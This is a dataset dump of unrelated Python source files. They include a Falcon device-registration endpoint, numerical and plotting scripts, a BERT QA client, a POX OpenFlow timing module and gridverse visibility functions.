deviceinfo_dict[key]\n\n incomingUUID = deviceinfo_dict['uuid']\n incomingEmail = deviceinfo_dict['user_email']\n\n #if uuid already exists\n deviceUser_dict = None\n try:\n if incomingEmail:\n deviceUser = Deviceinfo.select().where((Deviceinfo.user_email == incomingEmail) & (Deviceinfo.uuid == incomingUUID) ).get()\n deviceUser_dict = model_to_dict(deviceUser, recurse=False)\n else:\n deviceUser = Deviceinfo.select().where(Deviceinfo.uuid == incomingUUID).get()\n deviceUser_dict = model_to_dict(deviceUser, recurse=False)\n except:\n pass\n\n if deviceUser_dict:\n print('found preexisting')\n\n # apply the changes -- put\n for field in deviceinfo_dict:\n deviceUser_dict[field] = deviceinfo_dict[field]\n\n deviceUser_dict['email_token'] = email_token\n\n # save changes\n updated_deviceinfo = dict_to_model(Deviceinfo, deviceUser_dict, ignore_unknown=True)\n updated_deviceinfo.save()\n\n #check if verified\n if deviceUser_dict['user_email'] and not deviceUser_dict['is_validated']:\n print('we have email and is not validated!')\n sendRegisterEmail(updated_deviceinfo)\n print('resending email')\n\n\n # response.body = json.dumps(model_to_dict(updated_deviceinfo), default=json_serial)\n info = {\n 'isSuccessful': True,\n 'isUpdate': True,\n 'isNew': False\n }\n response.body = json.dumps(info, ensure_ascii=False)\n\n else:\n print('no preexisting user')\n #check for preexising device uuid\n\n #create new Deviceinfo -- post\n new_deviceinfo = None\n deviceinfo_dict['is_validated'] = False\n deviceinfo_dict['email_token'] = email_token\n new_deviceinfo = dict_to_model(Deviceinfo, deviceinfo_dict, ignore_unknown=True)\n\n #remove new verfication_uuid before save\n new_deviceinfo.save()\n\n #also check for is_validated\n if(new_deviceinfo.user_email):\n # make temp uuid\n sendRegisterEmail(new_deviceinfo)\n\n response.status = falcon.HTTP_CREATED\n # response.body = json.dumps(model_to_dict(new_deviceinfo), default=json_serial)\n info = {\n 'isSuccessful': True,\n 'isUpdate': False,\n 'isNew': True\n }\n response.body = json.dumps(info, ensure_ascii=False)\n\n\n\n except Exception as e:\n raise falcon.HTTPBadRequest(description=str(e))\n\n\n\n @falcon.before(check_logged_in)\n def on_put(self, request, response, deviceinfo_id=None):\n # Do not allow POST (create) when deviceinfo_id is given\n if deviceinfo_id is None:\n raise falcon.HTTPBadRequest(description=\"deviceinfo_id can not be empty: deviceinfo/123\")\n\n try:\n\n # load the request body\n changes = json.loads(request.stream.read() or 0)\n\n #sanitize input\n bad_keys = ['id']\n for key in bad_keys:\n if(key in changes):\n del changes[key]\n\n\n #find Deviceinfo to update\n deviceinfo = Deviceinfo.get_by_id(deviceinfo_id)\n deviceinfo_dict = model_to_dict(deviceinfo, recurse=False)\n\n # apply the changes\n for field in changes:\n deviceinfo_dict[field] = changes[field]\n\n # save changes\n updated_deviceinfo = dict_to_model(Deviceinfo, deviceinfo_dict, ignore_unknown=True)\n updated_deviceinfo.save()\n\n except Deviceinfo.DoesNotExist as e:\n raise falcon.HTTPNotFound(\n description='Deviceinfo with deviceinfo_id: ' + str(deviceinfo_id) + ' not found'\n )\n\n except Exception as e:\n raise falcon.HTTPInternalServerError(description=str(e))\n\n response.body = json.dumps(model_to_dict(updated_deviceinfo),default=json_serial)\n\n\n\n @falcon.before(check_logged_in)\n def on_delete(self, request, response, deviceinfo_id=None):\n\n if deviceinfo_id is None:\n raise falcon.HTTPBadRequest(description=\"deviceinfo_id can not be empty: deviceinfo/123\")\n\n\n try:\n #find Deviceinfo\n deviceinfo = Deviceinfo.get_by_id(deviceinfo_id)\n deviceinfo.delete_instance()\n\n except Deviceinfo.DoesNotExist as e:\n raise falcon.HTTPNotFound(\n description='Deviceinfo with deviceinfo_id: ' + str(deviceinfo_id) + ' not found'\n )\n\n except Exception as e:\n print (e)\n raise falcon.HTTPInternalServerError(description=str(e))\n\n response.status = falcon.HTTP_NO_CONTENT\n\n\ndef sendRegisterEmail(deviceinfo):\n \"\"\"Device info email sending method\"\"\"\n\n url = configuration['email']['siteurl'] + 'verifyuser?email=' + deviceinfo.user_email + '&uuid=' + deviceinfo.uuid + '&token=' + deviceinfo.email_token\n\n # try:\n message = \"You have started registration for the ScienceCache citizen science phone application. Please click the\\n\" \\\n \"registration link below to complete registration.

Register Here\"\n email = MIMEText(message, 'html')\n email['Subject'] = 'Sciencecache email registration'\n email['From'] = configuration['email']['from_email']\n email['Content'] = 'Content-type: text/html'\n\n email_recipients = []\n email_recipients.append(str(deviceinfo.user_email))\n email['To'] = \", \".join(email_recipients)\n\n send_registration = smtplib.SMTP(configuration['email']['smtp'])\n send_registration.sendmail(email['From'], email_recipients, email.as_string())\n send_registration.quit()\n # except Exception as e:\n # print(e)\n # raise falcon.HTTPInternalServerError(\n # title='Error sending registration email.',\n # description='Failed to send'\n # )","sub_path":"endpoints/deviceinfo.py","file_name":"deviceinfo.py","file_ext":"py","file_size_in_byte":8514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"447435561","text":"import unittest\n\nfrom src.Algebra.Structures.Function.Parser.FunctionParser import FunctionParser\nfrom src.Calculus.Integration.QuadratureAlgorithm import QuadratureAlgorithm\n\n\nclass QuadratureTest(unittest.TestCase):\n\n @staticmethod\n def test_simple_derivative():\n parser = FunctionParser()\n q = QuadratureAlgorithm(3)\n graph = parser.parse(\"x^2+5\")\n q.approximate_integral(graph, 1, 2)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/MathTests/CalculusTests/QuadratureTests/test_quadrature.py","file_name":"test_quadrature.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"577484475","text":"import sounddevice as sd\r\nfrom scipy.io.wavfile import write\r\nfrom scipy.io.wavfile import read\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport math\r\nimport sys\r\n\r\nfs = 44100 # Sample rate\r\nseconds = 3 # Duration of recording\r\n\r\nif input(\"New recording? (y/n): \") == \"y\":\r\n\tprint(\"\\nRecording...\")\r\n\tmyrecording = sd.rec(int(seconds * fs), samplerate=fs, channels=2)\r\n\tsd.wait() # Wait until recording is finished\r\n\tprint(\"Done\")\r\n\twrite('output_cur.wav', fs, myrecording) # Save as WAV file \r\n\r\nfs3, data3 = read('output_cur.wav')\r\n#data3 = np.ndarray.tolist(data3)\r\n\r\nif input(\"Plot raw? (y/n): \") == \"y\":\r\n\tplt.plot(data3)\r\n\tplt.show()\t\r\n\r\n# if input(\"Plot gt.5 (y/n): \") == \"y\":\r\n# \tplt.plot(data3)\r\n# \tplt.scatter(np.where(data3 > 0.5)[0], data3[data3 > 0.5])\r\n# \tplt.show()\r\n\r\nif input(\"Plot peaks? (y/n): \") == \"y\":\r\n\tdetect_thresold = 0.5\r\n\tdots = np.where(data3 > detect_thresold)[0]\r\n\r\n\tsearch_bin = 1000\r\n\tpeaks = []\r\n\tpeakp = []\r\n\r\n\tpeaks.append(dots[0])\r\n\r\n\tfor d in dots:\r\n\t if d > peaks[-1] and d < peaks[-1]+search_bin:\r\n\t if data3[d][0] > data3[peaks[-1]][0]:\r\n\t peaks[-1] = d\r\n\t else:\r\n\t if d > peaks[-1] + search_bin:\r\n\t peaks.append(d)\r\n\r\n\tfor i in peaks:\r\n\t peakp.append(data3[i][0])\r\n\r\n\tplt.plot(data3)\r\n\tplt.scatter(peaks, peakp)\r\n\tplt.show()\r\n","sub_path":"rec_sound.py","file_name":"rec_sound.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"506045699","text":"# coding=utf-8\n\"\"\"Bezier Surface using python, numpy and matplotlib\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as mpl\nfrom mpl_toolkits.mplot3d import Axes3D\n\n__author__ = \"Daniel Calderon\"\n__license__ = \"MIT\"\n\n\ndef generateT(t):\n return np.array([[1, t, t**2, t**3]]).T\n\n\ndef evalBernstein3(k, t):\n # Full Bezier Matrix\n Mb = np.array([[1, -3, 3, -1], [0, 3, -6, 3], [0, 0, 3, -3], [0, 0, 0, 1]])\n \n T = generateT(t)\n \n return np.dot(Mb[k,:], T)[0]\n\n\ndef evalBezierSurfaceSample(ps, t, s):\n \n Q = np.zeros(3)\n for k in range(4):\n for l in range(4):\n Bk = evalBernstein3(k, s)\n Bl = evalBernstein3(l, t)\n \n Q += Bk * Bl * ps[k, l]\n \n return Q\n\ndef evalBezierSurface(ps, ts, ss):\n \n Q = np.ndarray(shape=(N, N, 3), dtype=float)\n for i in range(len(ts)):\n for j in range(len(ss)):\n Q[i,j] = evalBezierSurfaceSample(ps, ts[i], ss[j])\n\n return Q\n\nif __name__ == \"__main__\":\n \n \"\"\"\n Defining control points\n \"\"\"\n \n # A 4x4 array with a control point in each of those positions\n P = np.ndarray(shape=(4, 4, 3), dtype=float)\n P[0, 0, :] = np.array([[0, 0, 0]])\n P[0, 1, :] = np.array([[0, 1, 0]])\n P[0, 2, :] = np.array([[0, 2, 0]])\n P[0, 3, :] = np.array([[0, 3, 0]])\n \n P[1, 0, :] = np.array([[1, 0, 0]])\n P[1, 1, :] = np.array([[1, 1, 10]])\n P[1, 2, :] = np.array([[1, 2, 10]])\n P[1, 3, :] = np.array([[1, 3, 0]])\n \n P[2, 0, :] = np.array([[2, 0, 0]])\n P[2, 1, :] = np.array([[2, 1, 10]])\n P[2, 2, :] = np.array([[2, 2, 10]])\n P[2, 3, :] = np.array([[2, 3, 0]])\n \n P[3, 0, :] = np.array([[3, 0, 0]])\n P[3, 1, :] = np.array([[3, 1, -5]])\n P[3, 2, :] = np.array([[3, 2, -5]])\n P[3, 3, :] = np.array([[3, 3, 0]])\n \n # Setting up the matplotlib display for 3D\n fig = mpl.figure()\n ax = fig.gca(projection='3d')\n \n \"\"\"\n Visualizing the control points\n \"\"\"\n # They are sorted into a list of points\n Pl = P.reshape(16, 3)\n \n # Each component is queried from the previous array\n ax.scatter(Pl[:,0], Pl[:,1], Pl[:,2], color=(1,0,0), label=\"Control Points\")\n \n \"\"\"\n Discretizing the surface\n \"\"\"\n # We use the same amount of samples for both, t and s parameters\n N = 10\n \n # The parameters t and s should move between 0 and 1\n ts = np.linspace(0.0, 1.0, N)\n ss = np.linspace(0.0, 1.0, N)\n \n # This function evaluates the bezier surface at each t and s samples in the arrays\n # The solution is stored in the 2D-array Q, where each sample is a 3D vector\n Q = evalBezierSurface(P, ts, ss)\n \n \"\"\"\n Visualizing the Bezier surface\n \"\"\"\n # For convenience, we re-organize the data into a list of points\n QlinearShape = (Q.shape[0] * Q.shape[1], 3)\n Ql = Q.reshape(QlinearShape)\n \n # An option is to plot just each dot computed\n #ax.scatter(Ql[:,0], Ql[:,1], Ql[:,2], color=(0,0,1))\n \n # The more elegant option is to make a triangulation and visualize it as a surface\n surf = ax.plot_trisurf(Ql[:,0], Ql[:,1], Ql[:,2], linewidth=0, antialiased=False)\n\n # Showing the result\n ax.set_xlabel('x')\n ax.set_ylabel('y')\n ax.set_zlabel('z')\n ax.legend()\n mpl.title(\"Bezier Surface\")\n mpl.show()","sub_path":"examples/ex_surface.py","file_name":"ex_surface.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"314337979","text":"\"\"\"\n * Given an array nums containing n + 1 integers\n * where each integer is between 1 and n (inclusive),\n * prove that at least one duplicate number must exist.\n * Assume that there is only one duplicate number, find the duplicate one.\n\n Note:\n You must not modify the array (assume the array is read only).\n You must use only constant, O(1) extra space.\n Your runtime complexity should be less than O(n2).\n There is only one duplicate number in the array, but it could be repeated more than once.\n\"\"\"\n\n\nclass Solution1(object):\n def findDuplicate(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n lo, hi = 1, len(nums) - 1\n while lo < hi:\n mid = lo + (hi - lo) / 2\n count = 0\n for num in nums:\n if num <= mid:\n count += 1\n if count <= mid:\n lo = mid + 1\n else:\n hi = mid\n return lo\n\n\nclass Solution(object):\n def findDuplicate(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n n = len(nums)\n slow = fast = 0\n while fast < n and nums[fast] < n:\n slow = nums[slow]\n fast = nums[nums[fast]]\n if slow == fast: break\n\n fast = 0\n while slow != fast:\n slow, fast = nums[slow], nums[fast]\n return slow\n","sub_path":"medium/FindtheDuplicateNumber.py","file_name":"FindtheDuplicateNumber.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"644410289","text":"import numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Polygon\nfrom matplotlib.collections import PatchCollection\n\nfrom pmc import PMC\nimport util\n\ndef equacao_reta(x, y):\n return (x>-5) * (x<5) * (y>-5) * (y<5)\n # return (x>0) * (y>0) * (y>-x+5)\n # return y > -x + 5\n\ndef ativacao_reta(x, y):\n # degrau bipolar\n return equacao_reta(x,y)*2-1\n\ndef gerar_datasets(sufixo):\n util.gerar_dataset_grid('reta_1/dataset_treino_%s.data'%str(sufixo), ativacao_reta, tamanho=400)\n # util.gerar_dataset('reta_1/dataset_treino_%s.data'%str(sufixo), ativacao_reta, tamanho=10)\n util.gerar_dataset('reta_1/dataset_teste_%s.data'%str(sufixo), ativacao_reta, tamanho=1500)\n\ndef treinar_rede(dataset, rn=None):\n x,d = dataset\n\n if(rn == None):\n rn = PMC(topologia=[2,8,4,2])\n\n rn.treinar(x, d, verbose=1, guardar_historico=1)\n\n rn.plotar_curva_aprendizado('Treino (%d épocas de treinamento)'%rn.epoca)\n\n rn.plotar_aprendizado(titulo='Treino (%d épocas de treinamento)'%rn.epoca)\n \n # rn.plotar_animacao(x,d,titulo='Treino (%d épocas de treinamento)'%rn.epoca)\n \n # rn.salvar_animacao(x,d,titulo='Treino (%d épocas de treinamento)'%rn.epoca,nome_arquivo='reta_1/animacao.mp4')\n\n return rn\n\ndef testar_rede(rn, dataset):\n x,d = dataset\n \n y = rn.classificar(x)\n\n erro = (y != d).sum()\n erro_perc = 100*erro/float(d.size)\n\n rn.plotar_aprendizado(x,d,titulo='Teste (%.4f%% de erro)'%erro_perc)\n\ndef main():\n sufixo = '1'\n\n gerar_datasets(sufixo)\n\n dataset_treino = util.carregar_dataset('reta_1/dataset_treino_%s.data'%str(sufixo))\n dataset_teste = util.carregar_dataset('reta_1/dataset_teste_%s.data'%str(sufixo))\n\n rn=None\n # rn = PMC.carregar('reta_1/rn_reta_%s.rn'%str(sufixo))\n\n # rn.plot_rn.plotar_dataset( dataset_treino[0] , dataset_treino[1] )\n \n rn = treinar_rede(dataset_treino, rn=rn)\n rn.salvar('reta_1/rn_reta_%s.rn'%str(sufixo))\n\n # testar_rede(rn, dataset_teste)\n\nif __name__ == \"__main__\":\n main()","sub_path":"capitulo_5_rede_pmc/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"522654933","text":"# SPDX-FileCopyrightText: 2020 Diego Elio Pettenò\n#\n# SPDX-License-Identifier: MIT\n\nimport datetime\nimport re\nfrom typing import Optional, Sequence\n\nfrom components import NameComponents\nfrom utils import build_dict_from_fake_table\n\n\ndef _try_old_hyperoptic(text_boxes, logger) -> Optional[NameComponents]:\n if (\n text_boxes[0] == \"www.hyperoptic.com\\n\"\n or text_boxes[0] == \"www.hyperoptic.com \\n\"\n ):\n account_holder_box = text_boxes[1]\n elif len(text_boxes) > 8 and text_boxes[7] == \"www.hyperoptic.com \\n\":\n account_holder_box = text_boxes[0]\n else:\n return None\n\n logger.debug(f\"looking for customer name in {account_holder_box!r}\")\n account_holder_match = re.search(r\"Customer Name: ([^\\n]+)\\n\", account_holder_box)\n assert account_holder_match\n account_holder_name = account_holder_match.group(1)\n\n # Extract the bill date from a \"fake table\".\n #\n # Older (2017~2018) Hyperoptic bills have two multi-line text boxes, one including all\n # the labels, and the other including all of the values.\n #\n # They thankfully sit next to each other, so once one is found, it's possible to find\n # the invoice date with relative ease.\n titles_str = find_box_starting_with(text_boxes, \"DD Ref:\\n\")\n\n titles_idx = text_boxes.index(titles_str[0])\n values_str = text_boxes[titles_idx + 1]\n\n document_info = build_dict_from_fake_table(titles_str, values_str)\n bill_date_str = document_info[\"Invoice date:\"]\n bill_date = datetime.datetime.strptime(bill_date_str, \"%d %b %Y\")\n\n return NameComponents(bill_date, \"Hyperoptic\", account_holder_name, \"Bill\",)\n\n\ndef try_hyperoptic(text_boxes, parent_logger) -> Optional[NameComponents]:\n logger = parent_logger.getChild(\"hyperoptic\")\n\n # Check for very old templates, used in 2017 to 2018.\n old_bill = _try_old_hyperoptic(text_boxes, logger)\n if old_bill:\n return old_bill\n\n # All Hyperoptic objects on the page are logos, not text. But Hypernews is fairly\n # specific, too.\n is_hyperoptic = \"Hypernews\\n\" in text_boxes\n\n # Older templates of the bills don't have \"Hypernews\", so we need to guess. If there's\n # a \"DD Ref\" field, and the following includes HYP, it's probably Hyperoptic.\n if not is_hyperoptic and \"DD Ref:\\n\" in text_boxes:\n dd_ref_idx = text_boxes.index(\"DD Ref:\\n\")\n dd_ref = text_boxes[dd_ref_idx + 1]\n is_hyperoptic = \"HYP\" in dd_ref\n\n if not is_hyperoptic:\n return None\n\n account_idx = text_boxes.index(\"Name:\\n\")\n account_holder_name = text_boxes[account_idx + 1].strip()\n\n date_idx = text_boxes.index(\"Bill date:\\n\")\n date_str = text_boxes[date_idx + 1]\n\n bill_date = datetime.datetime.strptime(date_str, \"%d %b %Y\\n\")\n\n return NameComponents(bill_date, \"Hyperoptic\", account_holder_name, \"Bill\",)\n","sub_path":"pdfrename/hyperoptic.py","file_name":"hyperoptic.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"19199588","text":"import logging\nimport multiprocessing\nimport numpy as np\nimport os\nimport time\n\nfrom gunpowder.caffe.net_io_wrapper import NetIoWrapper\nfrom gunpowder.ext import caffe\nfrom gunpowder.nodes.batch_filter import BatchFilter\nfrom gunpowder.producer_pool import ProducerPool, WorkersDied\nfrom gunpowder.roi import Roi\nfrom gunpowder.volume import VolumeTypes, Volume\n\nlogger = logging.getLogger(__name__)\n\nclass PredictProcessDied(Exception):\n pass\n\nclass Predict(BatchFilter):\n '''Augments the batch with the predicted affinities.\n '''\n\n def __init__(self, prototxt, weights, use_gpu=None):\n\n for f in [prototxt, weights]:\n if not os.path.isfile(f):\n raise RuntimeError(\"%s does not exist\"%f)\n\n # start prediction as a producer pool, so that we can gracefully exit if \n # anything goes wrong\n self.worker = ProducerPool([lambda gpu=use_gpu: self.__predict(gpu)], queue_size=1)\n self.batch_in = multiprocessing.Queue(maxsize=1)\n\n self.prototxt = prototxt\n self.weights = weights\n self.net_initialized = False\n\n def setup(self):\n self.worker.start()\n\n def teardown(self):\n self.worker.stop()\n\n def prepare(self, request):\n\n # remove request parts that we provide\n if VolumeTypes.PRED_AFFINITIES in request.volumes:\n del request.volumes[VolumeTypes.PRED_AFFINITIES]\n\n def process(self, batch, request):\n\n self.batch_in.put(batch)\n\n try:\n out = self.worker.get()\n except WorkersDied:\n raise PredictProcessDied()\n\n affs = out.volumes[VolumeTypes.PRED_AFFINITIES]\n affs.roi = request.volumes[VolumeTypes.PRED_AFFINITIES]\n affs.resolution = batch.volumes[VolumeTypes.RAW].resolution\n\n batch.volumes[VolumeTypes.PRED_AFFINITIES] = affs\n\n def __predict(self, use_gpu):\n\n if not self.net_initialized:\n\n logger.info(\"Initializing solver...\")\n\n if use_gpu is not None:\n\n logger.debug(\"Predict process: using GPU %d\"%use_gpu)\n caffe.enumerate_devices(False)\n caffe.set_devices((use_gpu,))\n caffe.set_mode_gpu()\n caffe.select_device(use_gpu, False)\n\n self.net = caffe.Net(self.prototxt, self.weights, caffe.TEST)\n self.net_io = NetIoWrapper(self.net)\n self.net_initialized = True\n\n start = time.time()\n\n batch = self.batch_in.get()\n\n fetch_time = time.time() - start\n\n self.net_io.set_inputs({\n 'data': batch.volumes[VolumeTypes.RAW].data[np.newaxis,np.newaxis,:],\n })\n self.net.forward()\n output = self.net_io.get_outputs()\n\n predict_time = time.time() - start\n\n logger.info(\"Predict process: time=%f (including %f waiting for batch)\"%(predict_time, fetch_time))\n\n assert len(output['aff_pred'].shape) == 5, \"Got affinity prediction with unexpected number of dimensions, should be 1 (direction) + 3 (spatial) + 1 (batch, not used), but is %d\"%len(output['aff_pred'].shape)\n batch.volumes[VolumeTypes.PRED_AFFINITIES] = Volume(output['aff_pred'][0], Roi(), (1,1,1))\n\n return batch\n","sub_path":"gunpowder/caffe/nodes/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"525125035","text":"import wikipedia\n\n\nclass Wikipedia:\n \"\"\"Class used for the media wiki API REST requests\"\"\"\n\n def __init__(self, query):\n self.query = query\n\n def __repr__(self):\n '''Method to print the media wiki destination mess'''\n\n return self.query\n\n def get_request(self):\n '''method witch uses mediawiki client to request API'''\n place = ''\n wikipedia.set_lang(\"fr\")\n try: # two first sentences\n place = wikipedia.summary(f\"{self.query}\", sentences=2)\n except wikipedia.exceptions.DisambiguationError as e:\n try:\n place = wikipedia.summary(e.options[0], sentences=2)\n except wikipedia.exceptions.DisambiguationError as e:\n place = wikipedia.summary(e.options[1], sentences=2)\n except IndexError:\n print(\"error\")\n place = {\"error\": \"no result\"}\n return place\n","sub_path":"controler/wiki.py","file_name":"wiki.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"38525253","text":"\nfrom .run_squad import process_inputs, process_result, process_output\nimport grpc \nimport json\nimport os\nimport requests\nfrom . import tokenization\nimport grpc \nimport tensorflow as tf\nfrom tensorflow_serving.apis import prediction_service_pb2_grpc, predict_pb2\n\ntf1 = tf.compat.v1\n\nclass Client(object): \n\n def __init__(self, hostport): \n self.hostport = hostport\n self.headers = { \"Content-type\": \"application/json\" }\n self.channel = grpc.insecure_channel(self.hostport)\n self.stub = prediction_service_pb2_grpc.PredictionServiceStub(self.channel)\n self.model_request = predict_pb2.PredictRequest() \n\n def predict(self, input_data, _id):\n \n self.generate_test_file(input_data, _id) \n self.process_inputs(_id) \n\n record_iterator = tf1.python_io.tf_record_iterator(path='./app/inputs/{}/eval.tf_record'.format(_id))\n\n self.model_request.model_spec.name = 'bert-qa'\n\n all_results = []\n\n for string_record in record_iterator:\n \n self.model_request.inputs['examples'].CopyFrom(\n tf.make_tensor_proto(\n string_record,\n dtype=tf.string,\n shape=[1]\n )\n )\n \n result_future = self.stub.Predict.future(self.model_request, 30.0) \n raw_result = result_future.result().outputs\n all_results.append(process_result(raw_result))\n\n result = process_output(all_results, self.examples, self.features, input_data, _id)\n return json.dumps(result)\n\n def process_inputs(self, _id):\n self.examples, self.features = process_inputs(_id)\n\n\n def generate_test_file(self, input_data, _id): \n with open('./app/inputs/{}/input.json'.format(_id), 'w') as outfile:\n json.dump(input_data, outfile) ","sub_path":"app/bert_client/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"19118826","text":"#!/usr/bin/env python\n#\n# Script: pox_flowmod.py\n# Description:\n# Pox module to test flow install performance\n\nimport time\n\nimport pox.openflow.libopenflow_01 as of\nfrom pox.core import core\nfrom pox.lib.revent import *\nfrom pox.lib.addresses import IPAddr, IPAddr6, EthAddr\n\nlog = core.getLogger()\n\nin_time = None\nrm_time = None\n\nTRIALS = 100\n\nINSTALL = 0\nREMOVE = 1\ncurrent = INSTALL\n\nins = []\nrms = []\ncount = 0\n\ndef install(dp):\n global in_time\n global current\n\n log.info(\"Installing flow\")\n msg = of.ofp_flow_mod()\n msg.command = of.OFPFC_ADD\n msg.priority = 1\n msg.match = of.ofp_match()\n msg.match.nw_src = IPAddr(\"192.168.2.101\")\n msg.match.nw_dst = IPAddr(\"192.168.2.102\")\n msg.match.dl_type = 0x800\n msg.actions.append(of.ofp_action_output(port=1))\n \n current = INSTALL\n in_time = time.time()\n dp.send(msg)\n msg = of.ofp_barrier_request()\n dp.send(msg)\n \ndef remove(dp):\n global rm_time\n global current\n\n log.info(\"Removing flow\")\n msg = of.ofp_flow_mod()\n msg.priority = 1\n msg.command = of.OFPFC_DELETE_STRICT\n msg.match = of.ofp_match()\n msg.match.nw_src = IPAddr(\"192.168.2.101\")\n msg.match.nw_dst = IPAddr(\"192.168.2.102\")\n msg.match.dl_type = 0x800\n msg.actions.append(of.ofp_action_output(port=1))\n\n current = REMOVE\n rm_time = time.time()\n dp.send(msg)\n msg = of.ofp_barrier_request()\n dp.send(msg)\n \ndef handleConnectionUp(event):\n log.info(\"DPID {0} is online\".format(event.dpid))\n install(event.connection)\n \ndef handleBarrierIn(event):\n global ins\n global rms\n global count\n\n log.info(\"--barrier in\")\n\n if current == INSTALL:\n elapsed = time.time() - in_time\n s = \"install\"\n else:\n elapsed = time.time() - rm_time\n s = \"remove\"\n\n t = round(elapsed * 1000, 3)\n log.info(\"Done {0}: {1}\".format(s, t))\n\n if current == INSTALL:\n ins.append(t)\n remove(event.connection)\n else:\n count += 1\n rms.append(t)\n if count < TRIALS:\n install(event.connection)\n else:\n ins.sort()\n rms.sort()\n log.info(\"Install:\\n Median: {0}, 95th: {1}\".format(ins[int(len(ins) * 0.5)],\n ins[int(len(ins) * .95)]))\n\n log.info(\"Remove:\\n Median: {0}, 95th: {1}\".format(rms[int(len(rms) * 0.5)],\n rms[int(len(rms) * .95)]))\n\n \ndef launch():\n core.openflow.addListenerByName(\"ConnectionUp\", handleConnectionUp)\n core.openflow.addListenerByName(\"BarrierIn\", handleBarrierIn)\n log.info(\"Pox flowmod perf test online\")\n","sub_path":"ocean/perf/pox_flowmod.py","file_name":"pox_flowmod.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"435700515","text":"def count_ngrams(sequence, N):\r\n freq = {}\r\n length = len(sequence)\r\n\r\n for i in range(0, length-N+1):\r\n w = sequence[i:i+N]\r\n if w not in freq:\r\n freq[w] = 0\r\n freq[w] += 1\r\n return freq\r\n","sub_path":"Ngrams.py","file_name":"Ngrams.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"296444174","text":"from typing import Optional\n\nimport numpy as np\nimport numpy.random as rnd\nfrom typing_extensions import Protocol # python3.7 compatibility\n\nfrom gym_gridverse.geometry import (\n Area,\n Position,\n StrideDirection,\n diagonal_strides,\n)\nfrom gym_gridverse.grid import Grid\nfrom gym_gridverse.rng import get_gv_rng_if_none\nfrom gym_gridverse.utils.raytracing import cached_compute_rays_fancy\n\n\nclass VisibilityFunction(Protocol):\n def __call__(\n self,\n grid: Grid,\n position: Position,\n *,\n rng: Optional[rnd.Generator] = None,\n ) -> np.ndarray:\n ...\n\n\ndef full_visibility(\n grid: Grid,\n position: Position, # pylint: disable = unused-argument\n *,\n rng: Optional[rnd.Generator] = None, # pylint: disable = unused-argument\n) -> np.ndarray:\n\n return np.ones((grid.height, grid.width), dtype=bool)\n\n\ndef partial_visibility(\n grid: Grid,\n position: Position,\n *,\n rng: Optional[rnd.Generator] = None, # pylint: disable=unused-argument\n) -> np.ndarray:\n\n if position.y != grid.height - 1:\n # gym-minigrid does not handle this case, and we are not currently\n # generalizing it\n raise NotImplementedError\n\n visibility = np.zeros((grid.height, grid.width), dtype=bool)\n visibility[position.y, position.x] = True # agent\n\n # front\n x = position.x\n for y in range(position.y - 1, -1, -1):\n visibility[y, x] = visibility[y + 1, x] and grid[y + 1, x].transparent\n\n # right\n y = position.y\n for x in range(position.x + 1, grid.width):\n visibility[y, x] = visibility[y, x - 1] and grid[y, x - 1].transparent\n\n # left\n y = position.y\n for x in range(position.x - 1, -1, -1):\n visibility[y, x] = visibility[y, x + 1] and grid[y, x + 1].transparent\n\n # top left\n positions = diagonal_strides(\n Area(\n (0, position.y - 1),\n (0, position.x - 1),\n ),\n StrideDirection.NW,\n )\n for p in positions:\n visibility[p.y, p.x] = (\n (grid[p.y + 1, p.x].transparent and visibility[p.y + 1, p.x])\n or (grid[p.y, p.x + 1].transparent and visibility[p.y, p.x + 1])\n or (\n grid[p.y + 1, p.x + 1].transparent\n and visibility[p.y + 1, p.x + 1]\n )\n )\n\n # top right\n positions = diagonal_strides(\n Area(\n (0, position.y - 1),\n (position.x + 1, grid.width - 1),\n ),\n StrideDirection.NE,\n )\n for p in positions:\n visibility[p.y, p.x] = (\n (grid[p.y + 1, p.x].transparent and visibility[p.y + 1, p.x])\n or (grid[p.y, p.x - 1].transparent and visibility[p.y, p.x - 1])\n or (\n grid[p.y + 1, p.x - 1].transparent\n and visibility[p.y + 1, p.x - 1]\n )\n )\n\n return visibility\n\n\ndef minigrid_visibility(\n grid: Grid,\n position: Position,\n *,\n rng: Optional[rnd.Generator] = None, # pylint: disable = unused-argument\n) -> np.ndarray:\n\n if position.y != grid.height - 1:\n # gym-minigrid does not handle this case, and we are not currently\n # generalizing it\n raise NotImplementedError\n\n visibility = np.zeros((grid.height, grid.width), dtype=bool)\n visibility[position.y, position.x] = True # agent\n\n for y in range(grid.height - 1, -1, -1):\n for x in range(grid.width - 1):\n if visibility[y, x] and grid[y, x].transparent:\n 